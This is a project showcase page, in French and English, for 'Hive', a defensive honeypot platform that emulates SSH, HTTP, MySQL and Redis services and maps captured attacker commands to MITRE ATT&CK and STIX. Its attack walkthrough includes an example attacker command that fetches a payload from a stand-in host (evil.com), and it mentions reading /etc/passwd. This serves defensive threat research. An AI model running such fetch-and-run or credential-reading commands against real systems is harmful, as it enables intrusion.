Accueil / Projets / Hive

🐝 Hive — Advanced
Honeypot Network

Enterprise-grade, event-driven cyber deception platform built for real-time threat intelligence gathering.
Observer les TTPs des attaquants en temps réel via 4 pièges de protocoles — sans jamais exposer votre production.

Go (Golang) React 19 WebSockets MITRE ATT&CK STIX 2.1 SSH PTY Cyber Deception Threat Intel
2025–2026 Projet de Recherche Indépendant github.com/jeanlucndato v1.0 — Lock-Free Architecture

Performance & Architecture Highlights

4 Indicateurs Clés de Hive

100%
Lock-Free Event Architecture
Zero CPU blocking sur les listeners réseau. Go channels & goroutines garantissent un débit maximal même sous attaque brute-force.
4
Protocol Honeypots Built-in
SSH (PTY interactif), HTTP (WordPress & phpMyAdmin), MySQL (auth capture), Redis (parser RESP complet).
<10ms
Real-time WebSocket Latency
Pipeline WebSocket streaming vers le dashboard React 19. Chaque attaque est visible instantanément dans le SOC Dashboard.
Auto
Threat Intel Output
Génération automatique de STIX 2.1 + règles iptables dynamiques à chaque événement malveillant détecté.

Analyse Technique Approfondie

Architecture & Technical Deep-Dive

Hive repose sur trois piliers techniques distincts : un backend Go hautes performances, une couche d'émulation bas-niveau des protocoles réseau, et un pipeline automatisé de Cyber Threat Intelligence.

⚙️ Go Backend — Event Bus Lock-Free

Le cœur de Hive est un bus d'événements 100% asynchrone basé sur des goroutines et des channels Go natifs :

  • Goroutines légères : chaque connexion attaquant est traitée dans une goroutine isolée (~2KB RAM), permettant de gérer des milliers de connexions simultanées sans dégradation.
  • Lock-Free Channels : les événements réseau sont poussés dans des channels non-bloquants. Aucun mutex, aucun deadlock possible, même sous DoS ou brute-force intensif.
  • Orchestrateur principal : cmd/hive/ démarre tous les listeners en parallèle et supervise le bus d'événements central.
Performance garantie :
~0% CPU overhead sur idle listeners

🔌 Émulation Bas-Niveau des Protocoles

Chaque honeypot émule le protocole cible avec une fidélité suffisante pour tromper les scanners automatisés et les attaquants humains :

  • SSH PTY (internal/sshd/) : Pseudo-Terminal interactif complet. L'attaquant croit opérer sur un vrai shell Linux. Chaque commande (wget, curl, cat /etc/passwd) est capturée.
  • HTTP (internal/httpd/) : Simule WordPress (/wp-login.php, /wp-admin) et phpMyAdmin. Piège les scanners WPScan & Nikto.
  • MySQL (internal/mysqld/) : Capture le handshake d'authentification — credentials inclus — sans jamais exposer de vraies données.
  • Redis RESP (internal/redisd/) : Parser du protocole RESP complet pour détecter les tentatives CONFIG SET et exfiltrations.

🧠 Pipeline CTI — MITRE ATT&CK → STIX 2.1

Le pipeline de Cyber Threat Intelligence transforme chaque interaction brute en renseignement structuré exploitable :

  • Moteur MITRE (internal/mitre/) : Corrèle les commandes capturées aux identifiants ATT&CK. Ex: wget evil.comT1105 – Ingress Tool Transfer.
  • Processeur IOC (internal/store/) :
    • Génère threat-intel.stix.json (STIX 2.1) avec les Indicators of Compromise, les TTPs et les relations.
    • Écrit iptables-blocklist.txt pour un blocage réseau immédiat.
  • API & WebSocket (internal/api/) : Diffuse les événements en streaming vers le dashboard React 19 en moins de 10ms.
Raw Command MITRE TTP STIX 2.1 iptables

Schéma Interactif

Architecture & Data Flow

De l'attaquant au dashboard SOC — chaque octet est capturé, analysé et transformé en intelligence opérationnelle.

🔴 Attackers
SSH :2222  |  HTTP :8080  |  MySQL :3306  |  Redis :6379
🐚 SSH Trap
internal/sshd/
PTY interactif
🌐 HTTP Trap
internal/httpd/
WP & phpMyAdmin
🗄️ MySQL Trap
internal/mysqld/
Auth Capture
⚡ Redis Trap
internal/redisd/
RESP Parser
⚡ Event Bus — 100% Lock-Free
internal/event/ — Go Channels & Goroutines — Asynchronous Non-Blocking Pipeline
🎯 MITRE ATT&CK Engine
internal/mitre/
TTP Correlation & Tagging
📦 IOC Store & STIX Processor
internal/store/
STIX 2.1 + iptables blocklists
🔌 REST API & WebSocket Stream
internal/api/ — Port 8000 — <10ms event delivery
⚛️ React 19 — Cyber Operations Dashboard
frontend/ — TypeScript — Real-time Attack Feed — IOC Map — TTP Timeline

Frontend — SOC Dashboard

React 19 Cyber Ops Dashboard

Le dashboard est une Single Page Application construite avec React 19 et TypeScript, conçue pour absorber des flux d'événements haute fréquence sans perte de frame.

React 19 Concurrent Mode

Utilise le Concurrent Rendering de React 19 pour ne jamais bloquer l'UI lors d'un pic d'événements réseau. Les flux WebSocket sont traités en background sans impacter l'interactivité.

Live Attack Feed & IOC Map

Visualisation en temps réel du flux d'attaques, cartographie géographique des IOCs, timeline des TTPs MITRE et console d'alertes avec criticité colorisée.

WebSocket Streaming <10ms

Connexion WebSocket persistante vers ws://localhost:8000. Chaque événement généré côté Go est poussé instantanément sans polling.

🐝 HIVE — Cyber Operations Dashboard
// === LIVE ATTACK FEED ===========================
⚠ [CRITICAL] SSH Brute-Force 192.168.1.54 → T1110.001
⚡ [HIGH] HTTP Scan 10.0.0.23 → T1595.002
⚡ [HIGH] MySQL Auth 45.33.32.156 → T1190
ℹ [MED] Redis RESP 172.16.0.4 → T1078

// === IOC STORE — STIX 2.1 OUTPUT ================
stix:indicator created id:indicator--a2c4...
stix:malware linked id:malware--f8e1...
iptables BLOCK pushed 192.168.1.54/32

// === WEBSOCKET STREAM ============================
ws://localhost:8000 CONNECTED latency: 4ms
events/sec: 247 | goroutines: 1,204

Simulation d'Attaque Guidée

Attack Walkthrough — Hive en Action

Scénario réel : un attaquant découvre Hive et commence son opération. Voici comment la plateforme capture, analyse et neutralise chaque étape.

1
Phase 1 — Initial Access via SSH
🐚 L'attaquant se connecte au SSH Honeypot (port 2222)
Un attaquant scanne le réseau, découvre le port 2222 et tente une connexion SSH avec des credentials par défaut. Le piège SSH PTY accepte la connexion et présente un faux shell interactif.
attacker@kali — SSH Session
$ ssh root@target -p 2222
root@target's password: ***
Welcome to Ubuntu 22.04.3 LTS
Last login: Mon Jul 21 08:42:11 2026
root@target:~# wget http://evil.com/payload.sh
--2026-07-21 11:42:19-- http://evil.com/payload.sh
Connecting to evil.com... connected.
// 🐝 HIVE CAPTURED: wget evil.com → T1105
2
Phase 2 — Web Reconnaissance
🌐 Le piège HTTP intercepte un scan WordPress
En parallèle, un scanner automatisé tente d'accéder à /wp-login.php sur le port 8080. Le honeypot HTTP répond avec une fausse page WordPress qui enregistre toutes les requêtes.
Hive HTTP Trap — Port 8080
→ GET /wp-login.php 10.0.0.23
→ POST /wp-login.php user=admin&pass=admin123
→ GET /phpmyadmin/ 10.0.0.23
⚡ TTP Detected: T1595.002 — Active Scanning
3
Phase 3 — MITRE Correlation & CTI Output
🎯 Le moteur MITRE identifie les TTPs et génère le renseignement
Le moteur d'analyse corrèle les commandes brutes aux TTPs MITRE ATT&CK, puis le processeur IOC génère automatiquement les fichiers de blocage et le rapport STIX 2.1.
Hive — CTI Pipeline Output
// MITRE ATT&CK Correlations
→ T1105 Ingress Tool Transfer wget evil.com
→ T1110 Brute Force SSH :2222
→ T1595 Active Scanning /wp-login.php

// STIX 2.1 Generated
✔ threat-intel.stix.json WRITTEN
✔ iptables-blocklist.txt UPDATED
→ BLOCK 192.168.1.54/32
→ BLOCK 10.0.0.23/32
4
Phase 4 — Real-Time SOC Alert
⚛️ Le dashboard React 19 affiche l'alerte instantanément
Via le WebSocket stream, le dashboard React 19 reçoit l'événement en moins de 10ms. L'analyste SOC voit l'alerte en temps réel avec le TTP, l'IOC, la géolocalisation et les actions recommandées.
React SOC Dashboard — Alert Feed
// WebSocket Event Received (4ms)
🔴 CRITICAL ALERT TRIGGERED
attacker_ip : 192.168.1.54
protocol : SSH
ttp_id : T1105, T1110.001
ioc_type : ipv4-addr, url
stix_bundle : bundle--e3a1...
action : iptables BLOCKED ✔

Clean Architecture

Structure du Projet

Hive suit les principes de la Clean Architecture Go côté backend et les bonnes pratiques d'une SPA React côté frontend : séparation stricte des responsabilités, testabilité et extensibilité.

Separation of Concerns (SoC)

Chaque package Go a une responsabilité unique : listeners, event bus, MITRE engine, store et API sont totalement découplés.

Event-Driven Design Pattern

Pas de couplage direct entre les honeypots et les processeurs. Tout communique via le bus d'événements central.

Extensible par Design

Ajouter un nouveau honeypot (FTP, SMTP, RDP) revient à créer un nouveau package internal/ftpd/ et l'enregistrer dans le bus.

🐝 hive/ — Advanced Honeypot Network
📁 cmd/hive/ — Point d'entrée & orchestrateur principal
└── main.go — Démarre tous les listeners en parallel
📁 internal/
📁 sshd/ — 🐚 SSH Trap avec PTY interactif
└── handler.go — Pseudo-Terminal, capture commandes
📁 httpd/ — 🌐 Pièges HTTP (WordPress, phpMyAdmin)
├── wordpress.go — Émulation /wp-login.php
└── phpmyadmin.go — Émulation phpMyAdmin
📁 mysqld/ — 🗄️ Capture auth MySQL
└── protocol.go — Handshake MySQL, credential logging
📁 redisd/ — ⚡ Parser protocole RESP (Redis)
└── resp.go — Parser RESP, détection CONFIG SET
📁 event/ — ⚡ Bus d'événements Lock-Free
└── bus.go — Go channels non-bloquants
📁 mitre/ — 🎯 Moteur MITRE ATT&CK
└── correlate.go — Mapping commandes → TTP IDs
📁 store/ — 📦 IOC Store & CTI Processor
├── stix.go — Génération STIX 2.1 JSON
└── blocklist.go — Export iptables-blocklist.txt
📁 api/ — 🔌 Serveur HTTP REST & WebSocket
├── rest.go — Endpoints REST Port 8000
└── websocket.go — Streaming temps réel <10ms
📁 frontend/ — ⚛️ React 19 + TypeScript SPA
├── src/
│ ├── components/ — Dashboard, Feed, IOCMap
│ └── hooks/useWebSocket.ts — WebSocket hook React
└── package.json
📄 go.mod
📄 README.md
⚖️

Éthique & Utilisation Responsable — Avertissement Légal

Hive est un outil de recherche en sécurité défensive. Cette plateforme de cyber-déception est conçue exclusivement pour :

  • Le déploiement sur vos propres infrastructures et réseaux avec autorisation explicite.
  • La recherche académique et les environnements de laboratoire contrôlés.
  • La collecte de renseignements sur les menaces (CTI) pour renforcer la posture de sécurité défensive.
  • Les exercices de red team / blue team dans des cadres légaux définis.

Utiliser ce projet sur des systèmes sans autorisation explicite constitue une infraction pénale. L'auteur décline toute responsabilité pour tout usage illicite ou abusif de cette plateforme. Respectez toujours les lois locales en vigueur sur la cybersécurité et les systèmes informatiques.

🛡️ Ethical Hacking only — Deploy on authorized networks — Legal use only